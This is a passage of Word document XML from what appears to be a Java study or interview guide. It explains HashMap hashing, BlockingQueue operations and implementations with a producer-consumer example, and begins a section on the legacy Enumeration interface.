    </w:p>
    <w:p w14:paraId="25567D9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DE9A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9313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01CF65"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07E19F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hashCode() method generates a hash value based on the employee's name (name.hashCode() in this case).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B66B54"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HashMap</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45043A5C" w14:textId="77777777" w:rsidR="00D32F5E" w:rsidRPr="00CE4B95" w:rsidRDefault="00D32F5E" w:rsidP="00254D48">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>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stores and checks keys:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C44E694"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n Employee object, HashMap calculates the hash code of the key using hashCode().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4EB991"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hen places the object in the corresponding bucket in the internal array.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3931EEFB"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EB7EAB7"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to verify whether two objects with the same hash code are actually the same or not.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00B45A75"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ensures efficient distribution of objects across the internal array, whil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checks the actual equality of two objects in case of a hash collision.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E2E24C" w14:textId="100A18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89" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="17F2CAD7" w14:textId="77777777" w:rsidR="003054BB" w:rsidRPr="00CE4B95" w:rsidRDefault="003054BB">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="207" w:name="_Toc197867421"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is a Blocking Queue?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="207"/>
    </w:p>
    <w:p w14:paraId="00854870" w14:textId="1B207BB5" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="004945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a type of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that supports operations that block when the queue is either full or empty. It is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java.util.concurrent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> package and is typically 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applications, especially in producer-consumer scenarios.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1438AE48"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 BlockingQueue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D82BF78"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Insertion</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BF85697"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full</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an element will be blocked until there is space available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="011EC7E9"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Removal</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14E7DC3C"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an element will be blocked until there is an element available in the queue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DF8B22E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68D85F85"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is thread-safe, meaning multiple threads can safely put and take elements from the queue simultaneously.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD55A7A"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ness</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FCE4B8"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me implementations of BlockingQueue can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>fair</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (using FIFO order for thread access) or </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>unfair</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (where threads may not access the queue in a predictable order).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDF3DFC"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in BlockingQueue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0559CFE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supports the following operations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6189A55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Inserts an element into the queue. If the queue is full, the thread will block until space becomes available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7899AF75"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ke()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Removes and returns an element from the queue. If the queue is empty, the thread will block until an element is available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AED1111"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ffer()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Attempts to insert an element into the queue without blocking. If the queue is full, it returns false instead of blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33B492DE"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l()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Attempts to remove an element from the queue without blocking. If the queue is empty, it returns null instead of blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31731263"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Retrieves the head of the queue without removing it. It doesn't block but returns null if the queue is empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26951B3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ainingCapacity()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Returns the number of remaining spaces in the queue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41429A46"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ainTo()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Removes all the elements from the queue and places them in a given collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3325423A"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Implementations:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="376A79E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 A bounded blocking queue backed by an array. The size is fixed when it is created.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD3235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 A blocking queue backed by a linked node structure. It can have an optional capacity, or if not specified, it is virtually unbounded.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60FF1EE3"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orityBlockingQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A blocking queue that orders elements according to their natural ordering or by a specified comparator. Unlike other blocking queues, it does not have a capacity limit.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3650CE58"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ayQueue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: A specialized implementation of a blocking queue where each element has a delay associated with it. Elements cannot be taken until their delay has expired.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5508E4AD"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 (Producer-Consumer Problem):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5139B1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2D59FC4C" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7030AFD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roducer implements Runnable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16D5FEA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2A982890" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2A58DD8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roducer(BlockingQueue&lt;Integer&gt; queue) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E36526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750386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4A6FA7" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="79AA2D3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0955EC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D61394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5DF3BD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007D2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int) (Math.random() * 100);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4727C8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ed: " + value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C4851B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put(value); // Blocks if the queue is full</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D735AF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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D761AF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4352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01A86D2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356FD29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EF0D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B409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4A9901" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CDCB0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sumer implements Runnable {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49768DF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64314E77" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="529C103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nsumer(BlockingQueue&lt;Integer&gt; queue) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4827A1F1"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337C73B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70132A" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0E9C0A6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346CFB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1E9BFE0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16CCB6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25C4E4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queue.take(); // Blocks if the queue is empty</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D83814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sumed: " + value);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09044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500);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="039059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BBD2C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6792B5F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025AFCF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6CFA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79A15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2FB62A" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5F6C3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lockingQueueExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F2A34D"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6F95C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lockingQueue&lt;Integer&gt; queue = new ArrayBlockingQueue&lt;&gt;(10); // A bounded queue with capacity 10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D257E7" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5A82F39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producerThread = new Thread(new Producer(queue));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CC7A3F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consumerThread = new Thread(new Consumer(queue));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E985AE" w14:textId="77777777" w:rsidR="003578D9" w:rsidRPr="00CE4B95" w:rsidRDefault="003578D9" w:rsidP="00494518">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36BA4D5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erThread.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2435B00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umerThread.start();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AAE3F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D1833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A3D197"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8AC43F3"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Producer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> adds random integers to the BlockingQueue, and the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Consumer</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> takes integers from the queue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03B7C707"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the producer thread will block until there is space.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5B13DC"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empty, the consumer thread will block until there is something to consume.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D15C13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of BlockingQueue:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16A2B3E7"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Where multiple producers generate data and multiple consumers process the data. The BlockingQueue ensures that producers block when the queue is full and consumers block when the queue is empty.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ADC529F"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Scheduling</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Threads can submit tasks to a BlockingQueue, and worker threads can take and process these tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="715A9652"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ource Management</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you have a fixed pool of resources and want threads to wait for a resource to become available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B45ABA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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AD79DE7"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Automatically handles synchronization between threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CD19E81"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Nature</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Blocks threads instead of busy-waiting, leading to more efficient resource utilization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50BA90CE"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s Concurrency</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Ideal for scenarios where you need coordination between producer and consumer threads without manually handling synchronization.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17B593AC" w14:textId="77777777" w:rsidR="00442310" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00442310">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="1A0E0733">
          <v:rect id="_x0000_i1590" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEEDB1E" w14:textId="77777777" w:rsidR="00442310" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310" w:rsidP="00442310">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="208" w:name="_Toc197867422"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Enumeration in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="208"/>
    </w:p>
    <w:p w14:paraId="3C8E888D" w14:textId="6320D912" w:rsidR="00442310" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310" w:rsidP="006F45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that was introduced in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java 1.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and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r-each loop</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43196097"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1" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9B52C1"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Enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A174B90" w14:textId="77777777" w:rsidR="00006285"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for Legacy Classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Enumeration was primarily designed to iterate over </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>legacy collection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746A5438" w14:textId="50893085" w:rsidR="00442310"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eration has only two main methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D0138F" w14:textId="77777777" w:rsidR="00006285"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MoreElements()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Checks if there are more elements in the collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304DCB0E" w14:textId="27E1E9B9" w:rsidR="00442310"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xtElement()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Retrieves the next element in the collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3373AF74"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Syntax and Usage of Enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130E4AE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65BE5D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8D613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D75B5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D7E2B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Vector (legacy collection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55212C3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vec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gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AB40CE"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68E2097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4291B9A0"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6B8B0D1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81D64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n Enumeration object from the Vector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2006B1D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ume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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE27B73"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A6B08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Enumeration to iterate through the Vector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CF55B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MoreEle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B862"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Element</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07664C17"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81C294"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7B2104" w14:textId="13106A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AF6E"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Enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A0CA3A"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oolean hasMoreElements()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
